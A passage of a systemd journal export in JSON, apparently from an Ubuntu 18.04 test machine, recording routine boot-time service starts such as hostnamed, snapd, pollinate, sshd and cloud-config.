"_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-hostnamed.service", "INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "MESSAGE" : "Started Hostname Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818634669" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=333;b=e2b08827b5804427b422c10c84f1567e;m=2a64671;t=5bd16df69c5d9;x=8b8d263511ef7d30", "__REALTIME_TIMESTAMP" : "1615280818734553", "__MONOTONIC_TIMESTAMP" : "44451441", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/hostname/hostnamed.c", "CODE_LINE" : "483", "CODE_FUNC" : "method_set_hostname", "SYSLOG_IDENTIFIER" : "systemd-hostnamed", "MESSAGE" : "Changed host name to 'host-192-168-10-95'", "_PID" : "827", "_COMM" : "systemd-hostnam", "_EXE" : "/lib/systemd/systemd-hostnamed", "_CMDLINE" : "/lib/systemd/systemd-hostnamed", "_CAP_EFFECTIVE" : "200000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-hostnamed.service", "_SYSTEMD_UNIT" : "systemd-hostnamed.service", "_SYSTEMD_INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818700892" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=334;b=e2b08827b5804427b422c10c84f1567e;m=2a95fca;t=5bd16df6cdf31;x=82aea42c373bff27", "__REALTIME_TIMESTAMP" : "1615280818937649", "__MONOTONIC_TIMESTAMP" : "44654538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "98b8e18cae2b44329dd2b99cfc8ca266", "SYSLOG_IDENTIFIER" : "networkd-dispatcher", "MESSAGE" : "No valid path found for iwconfig", "_PID" : "778", "_COMM" : "networkd-dispat", "_CMDLINE" : "/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers", "_SYSTEMD_CGROUP" : "/system.slice/networkd-dispatcher.service", "_SYSTEMD_UNIT" : "networkd-dispatcher.service", "_SYSTEMD_INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=335;b=e2b08827b5804427b422c10c84f1567e;m=2a9702b;t=5bd16df6cef93;x=613965ac6fdc269a", "__REALTIME_TIMESTAMP" : "1615280818941843", "__MONOTONIC_TIMESTAMP" : "44658731", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "98b8e18cae2b44329dd2b99cfc8ca266", "SYSLOG_IDENTIFIER" : "networkd-dispatcher", "_PID" : "778", "_COMM" : "networkd-dispat", "_CMDLINE" : "/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers", "_SYSTEMD_CGROUP" : "/system.slice/networkd-dispatcher.service", "_SYSTEMD_UNIT" : "networkd-dispatcher.service", "_SYSTEMD_INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "MESSAGE" : "No valid path found for iw" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=336;b=e2b08827b5804427b422c10c84f1567e;m=2aa0b15;t=5bd16df6d8a7d;x=a341e91927040427", "__REALTIME_TIMESTAMP" : "1615280818981501", "__MONOTONIC_TIMESTAMP" : "44698389", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "networkd-dispatcher.service", "INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "MESSAGE" : "Started Dispatcher daemon for systemd-networkd.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818978129" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=337;b=e2b08827b5804427b422c10c84f1567e;m=2aac31b;t=5bd16df6e4282;x=2b8e71bb2b69ee26", "__REALTIME_TIMESTAMP" : "1615280819028610", "__MONOTONIC_TIMESTAMP" : "44745499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "MESSAGE" : "AppArmor status: apparmor is enabled and all features are available", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=338;b=e2b08827b5804427b422c10c84f1567e;m=2ae32b7;t=5bd16df71b21f;x=cf28ad7faf15f310", "__REALTIME_TIMESTAMP" : "1615280819253791", "__MONOTONIC_TIMESTAMP" : "44970679", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "MESSAGE" : "client verified challenge/response with [https://entropy.ubuntu.com/]", "_PID" : "901", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_CMDLINE" : "logger --id=787 -t pollinate client verified challenge/response with [https://entropy.ubuntu.com/]", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819253685" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=339;b=e2b08827b5804427b422c10c84f1567e;m=2ae7e71;t=5bd16df71fdd8;x=e62c3f540e40b1a0", "__REALTIME_TIMESTAMP" : "1615280819273176", "__MONOTONIC_TIMESTAMP" : "44990065", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "client hashed response from [https://entropy.ubuntu.com/]", "_PID" : "909", "_CMDLINE" : "logger --id=787 -t pollinate client hashed response from [https://entropy.ubuntu.com/]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819273149" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33a;b=e2b08827b5804427b422c10c84f1567e;m=2ae93e9;t=5bd16df721350;x=37ab24b8f1ef2da3", "__REALTIME_TIMESTAMP" : "1615280819278672", "__MONOTONIC_TIMESTAMP" : "44995561", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "lxd-containers.service", "INVOCATION_ID" : "69bb4a33e4a84106a814b4eb83881d94", "MESSAGE" : "Started LXD - container startup/shutdown.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819276209" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33b;b=e2b08827b5804427b422c10c84f1567e;m=2ae9eec;t=5bd16df721e53;x=c7bc168b61122055", "__REALTIME_TIMESTAMP" : "1615280819281491", "__MONOTONIC_TIMESTAMP" : "44998380", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "client successfully seeded [/dev/urandom]", "_PID" : "910", "_CMDLINE" : "logger --id=787 -t pollinate client successfully seeded [/dev/urandom]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819281481" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33c;b=e2b08827b5804427b422c10c84f1567e;m=2aeaaea;t=5bd16df722a51;x=69130601c522a0a9", "__REALTIME_TIMESTAMP" : "1615280819284561", "__MONOTONIC_TIMESTAMP" : "45001450", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "helpers.go:145: error trying to compare the snap system key: system-key missing on disk" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33d;b=e2b08827b5804427b422c10c84f1567e;m=2aec53e;t=5bd16df7244a6;x=cc7837c983afc749", "__REALTIME_TIMESTAMP" : "1615280819291302", "__MONOTONIC_TIMESTAMP" : "45008190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "pollinate.service", "INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "Started Pollinate to seed the pseudo random number generator.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819287852" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33e;b=e2b08827b5804427b422c10c84f1567e;m=2aef68d;t=5bd16df7275f4;x=2f8d56aa93754fe9", "__REALTIME_TIMESTAMP" : "1615280819303924", "__MONOTONIC_TIMESTAMP" : "45020813", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting OpenBSD Secure Shell server...", "UNIT" : "ssh.service", "INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819300793" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33f;b=e2b08827b5804427b422c10c84f1567e;m=2af6720;t=5bd16df72e686;x=75277391dc9d1904", "__REALTIME_TIMESTAMP" : "1615280819332742", "__MONOTONIC_TIMESTAMP" : "45049632", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:338: started snapd/2.40+18.04 (series 16; classic) ubuntu/18.04 (amd64) linux/4.15.0-60-generic." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=340;b=e2b08827b5804427b422c10c84f1567e;m=2b00b96;t=5bd16df738afe;x=bca15ef339dacb2e", "__REALTIME_TIMESTAMP" : "1615280819374846", "__MONOTONIC_TIMESTAMP" : "45091734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "SYSLOG_PID" : "939", "MESSAGE" : "Server listening on 0.0.0.0 port 22.", "_PID" : "939", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_CMDLINE" : "/usr/sbin/sshd -D", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819374819" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=341;b=e2b08827b5804427b422c10c84f1567e;m=2b00d9c;t=5bd16df738d03;x=487ff0bcc8930184", "__REALTIME_TIMESTAMP" : "1615280819375363", "__MONOTONIC_TIMESTAMP" : "45092252", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "SYSLOG_PID" : "939", "_PID" : "939", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_CMDLINE" : "/usr/sbin/sshd -D", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "MESSAGE" : "Server listening on :: port 22.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819375357" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=342;b=e2b08827b5804427b422c10c84f1567e;m=2b019b5;t=5bd16df73991d;x=3fed89be52fad7be", "__REALTIME_TIMESTAMP" : "1615280819378461", "__MONOTONIC_TIMESTAMP" : "45095349", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "ssh.service", "INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "MESSAGE" : "Started OpenBSD Secure Shell server.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819375573" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=343;b=e2b08827b5804427b422c10c84f1567e;m=2b034ae;t=5bd16df73b416;x=c95b0d8e6ae4d6f", "__REALTIME_TIMESTAMP" : "1615280819385366", "__MONOTONIC_TIMESTAMP" : "45102254", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.service", "INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "Started Snappy daemon.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819381660" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=344;b=e2b08827b5804427b422c10c84f1567e;m=2b04403;t=5bd16df73c36b;x=3cba2937f0e3ef5d", "__REALTIME_TIMESTAMP" : "1615280819389291", "__MONOTONIC_TIMESTAMP" : "45106179", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Wait until snapd is fully seeded...", "UNIT" : "snapd.seeded.service", "INVOCATION_ID" : "1c1d94917e114885abda5e3055bfa378", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819387422" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=345;b=e2b08827b5804427b422c10c84f1567e;m=2b67456;t=5bd16df79f3bd;x=443fb77a1ce2e531", "__REALTIME_TIMESTAMP" : "1615280819794877", "__MONOTONIC_TIMESTAMP" : "45511766", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "stateengine.go:108: state ensure error: cannot sections: got unexpected HTTP status code 403 via GET to \"https://api.snapcraft.io/api/v1/snaps/sections\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=346;b=e2b08827b5804427b422c10c84f1567e;m=2b8db68;t=5bd16df7c5acf;x=c5ecd1f1656c7b65", "__REALTIME_TIMESTAMP" : "1615280819952335", "__MONOTONIC_TIMESTAMP" : "45669224", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.seeded.service", "INVOCATION_ID" : "1c1d94917e114885abda5e3055bfa378", "MESSAGE" : "Started Wait until snapd is fully seeded.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819949158" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=347;b=e2b08827b5804427b422c10c84f1567e;m=2b8ec71;t=5bd16df7c6bd8;x=1551beb68721512d", "__REALTIME_TIMESTAMP" : "1615280819956696", "__MONOTONIC_TIMESTAMP" : "45673585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Apply the settings specified in cloud-config...", "UNIT" : "cloud-config.service", "INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819956688" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=348;b=e2b08827b5804427b422c10c84f1567e;m=2b91065;t=5bd16df7c8fcc;x=959a8e1f960992fa", "__REALTIME_TIMESTAMP" : "1615280819965900", "__MONOTONIC_TIMESTAMP" : "45682789", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", 